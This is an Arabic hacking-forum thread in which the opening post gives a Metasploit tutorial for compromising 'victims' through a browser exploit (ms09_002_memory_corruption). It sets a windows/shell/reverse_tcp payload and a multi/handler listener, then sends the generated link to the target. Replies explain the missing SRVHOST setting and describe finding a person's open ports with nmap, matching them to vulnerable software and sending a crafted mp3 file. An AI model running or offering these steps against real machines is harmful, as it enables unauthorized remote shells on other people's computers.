الميتـا والمتصفـح ...والاختــراق بثغرات المتصفح

[ALQAYSAR]

بســـم الله الرحمــن الرحيـم

الســـلام عليـــكم ورحمــة الله وبــــركــاتة ,,, كيــــفكم اخوانــي واخواتي في الصاعقة انشاء الله انكم
بخيـر ...

اليوم معــي لكـــم موضوع بسيــــــط جــدا وخفيــف ,,, عنوان الموضوع : المتصفح والميتـآآ

في البدآآية ..

انتشــر في ايــامنا هــذي بــرامج الاختــراق ,, وتكوين الســيرفر للاختراق ,.والدمج والتلغيــم ,,

والتشفيــر ,,وتلغيـم الصفحــات وغيـرهـآآ من اخــتراقات واســاليب الاختــراقات العشــوائيــة ,,

فقــاموا النـاس يتعلمون ,, لهذي الاســاليب .بدأو يتباهو به وكل واحد يحط بتوقيعه كم ضحية عنده

وتباهو بأنهم يعرفو يشفرو السيرفر وما يخلوه ينكشف من النود والكــاسبر ودعــس القيــمة جيــن

انا ماعارضكــم اخوانــي واخواتــي ,, في الشــي هــذاآآ بس لانـه بحد ذاتة الشي هذا انجاز كبير ورائــع لكن حاب اذكركـم بشــي ..


>>>لكن الاشخاص الي كذا ماتقدموا بشــي تتدرون لــيش ,, كل ما في الموضوع ان مبرمج صنع برنامج
ينتج سيرفر تحكم عن بعد وانتــم عرفتوا البرنامج وعرفتم طريقة تشفيــر السيرفر

(مع العلم انه المبرمج بنفسة دامج البرنامج )

وآحنــا نسيــنا شــي مهــم ..الـي هو الإختراق المستهدف ونسو الثغرات والبفر والفيض وغير ذلك اللي تخليك تخترق بدون ارسال أي شي

وانتم عــارفيــن ان للاانظمة ثغرات ,,,. واحنا لازم نستغــلهــا ,, ماعليــنا

نرجع للموضوع .. بــس هذا للتذكيــر

اليوم باشــرح لكم فــكرة بسيــطة الي هــي كيــف تسوي بايلود ..؟ زي ماتقولوا ؟؟ رابط انت تعمله بثغرة متصفح في الميتــا سبولت .. وتتصل مع الضحيـــة ..

تابعوا معــي ..
انشــاء الله الموضع سهــل ومافيــة اي شي ..

نفتح metasploit v3.3

ثـانيــا : نكــتب الامــــر show exploits

طيب كيــف تعــرف انهــا ثغــرة متصــفح .. يكون التبويــب تبعــهاآآ browser

انا مثــلأا راح استخــدم الثغـــرة هـــذي ,,

msf > use windows/browser/ms09_002_memory_corruption

طيب عنــد استغــلال اي ثغــرة .. نكــت use قبــل الاستغــلال


طيب اذا تبــغـى تعــرف خيــارات الثغـــرة تضغـــط info

الان نختــار show payloads انـت اختــار بـايلود ... المقصود صنع ملف تنفيــذي





طيب تشوفــوا الان هذي متطلــبات لابــد منهــا

للتنصــت >>>>use multi/handler

set LPORT >> البورت تبــعك ..

set lHOST>>> الايبــي ادرس تبــعك


هنا البــايلود>>>> set payload windows/shell/reverse_tcp
exploit >>>> الان استغــلال

ومو شــرط .. علــى حســب البـأيلود الــي عنــدك ,,,, مثــلا :

البــايند لايحتــاج الا الايبي تبعــك ,, بينمــا ,, العكــسي .. بحــاجه الى الايبي تبعــك


الان احظنا نفس خيارات البايلود .. الأن ننتظر حتى الضحية يفتح الملف يعني بعـد الانتهــاء راح ينشـى لك رابــط تعطي الضحيــة

انتظروا حتى الضحية فتح البايلود..وشبكنا إتصال عكسي مع الدوس ونتصنــت عليــة بالميــتا او النت كــات


وملاحظة \\ يمكن استخدام بايلود تانيةاخــر وبايند وريفرس يعني باالامكــان استخــدام النـت كـات او الاف ان سـي

يعني مشــابة لكــذا

الحمد لله انتهــى الشرح اشوفكم فــي موضوع اخر ,, ســـــــــلام

[black eagle]

شكراا على الموضوع
بس فية مشكله عندى انة مش بيعمل اتصال عكسى مع حد خارج الشبكة مع انى حاطط الاى بى الخارجى و عامل كل حاجة
و مش بيوصل

[COMMANDERXXX]

نشوف الشرح ونرجعلك حبيب القلب

[COMMANDERXXX]

أخي الغالي اول شي مشكور لطرحك الموضوع .. موضوع يستحق الطرح بس عندي كم تعقيب اذا سمحتلي ..
اول شي معلم الميتا ما انوجد للاختراق انوجد لعكس هالمهمة تماما وهي الحماية وسد الثغرات ...
تنين الاستهداف بالميتا صعب شوي بالاخير بدك تبعت شي للضحية منشان يستقبلو وتستغل اما انك تستغل ثغرة بجهازو من الاي بي بس يعني من دون ما تبعت شي فنسبة نجاحها ضئيلة جدا اساسا معظم الثغرات للاستغلال من دون ما تبعتلو شي بتعتمد عالبورت 445 الي قرب ينقرض ....
* لو اجا واحد وطبق متل ما انت عامل بالضبط مارح يمشي معو الثغرات الا عالشبكة الداخلية بس يعني جهازو وشبكتو الداخلية لانك اغفلت امر مهم جدا srvhost
اما انو يجي واحد ويسألني انو هل من الممكن الاختراق من دون ما تبعت شي طيب ...
الجواب طبعا ممكن بس ما بهالطرق الطريقة الصحيحة ..
انك تستخدم ثغرات لوكال او ريموت يعني ببرامج معينة موجودة عندو والاختراق فيها بيكون اسهل من الباتش بسبب الصيغ mp3 or wam ......
وانا حصلت ثغرة txt
يعني مجالاتها واسعة جدا بس كل هدول الثغرات بيعتمدو عبرامج بجهاز الضحية يعني لازم تعمل دراسة عن جهازو ....
طيب بيجي حد تاني بيقلي اي شو بروح بسألو شو عندك برامج منشان اخترقك منون ......... لوووول عجبني هالسؤال
لا حبي في شي عندك اسمو nmap ما عليك الا انك تعمل بحث عن البورتات الي بجهازو طبعا من خلال الاي بي وتشوف هالبورت المفتوح لاي برنامج تابع بمواقع السيكيورتي مثلا وهيك انت بتعرف شو بدك تعمل بالضبط... يعني لنفرض انك شفت البورت 5559 "رقم افتراضي" مفتوح عندو طيب انت بتدخل عموقع السيكوريتي وبتدور عالبرامج الي بتستخدو ... لنفرض شفت ال media player بيستخدم هالبورت بتروح بتدور عثغرات الميديا ... طبعا ملاحظة مهمة بتنتبه عالاصدار لازم يوافق كلشي الاصدار والبرنامج والبورت كلو مع كلو وبتبعتلو ملف تكوين الثغرة الي رح يكون امتدادو مثلا mp3
انشالله يكون كلشي واضح اسف لاني طولت مع اني اختصرت جدا جزيلا بس لازم هالتوضيحات الصغيرة ...
تقبل مروري اخي الكريم

[xXJoKeRXx]

يا عيني عليك .. اول الشي بحب اشكر ALQAYSAR على موضوعه الاكثر من رائع بصراحة .. و شرح جميل

تاني شي .. بالنسبة للعائد الجديد .. ^^ هههههههه COMMANDERXXX ... يا اخي انت عندك عقل مفكر ...

انا جربت برنامج ال nmap .. للكشف عن ثغرات السيرفرات .. بس بتصدق ما اجا ببآلي استغلو بالكشف عن ثغرات جهاز معين ..

و هي طريقة جديدة و شي حلو انو عرفتها .. ^^

و رح جربها .. ما عاد في اسهل من هيك يعني

جيب الاي بي تبعو .. افتح جهازو عن طريق الـ nmap .. ^^ و اخترق وانت مرتاح .. وااو ... هههههههههه ...


ما عندي كلام غير تفكير صآئب .. وبرابو عليك ...

ما قصرت حبيبي وافي .. كل كلمة قلتها صحيحة ... ~ .. بإنتظارك حبيبي ~

[alshihri]

مشكورررررررر

[taha919]

mashkoooooor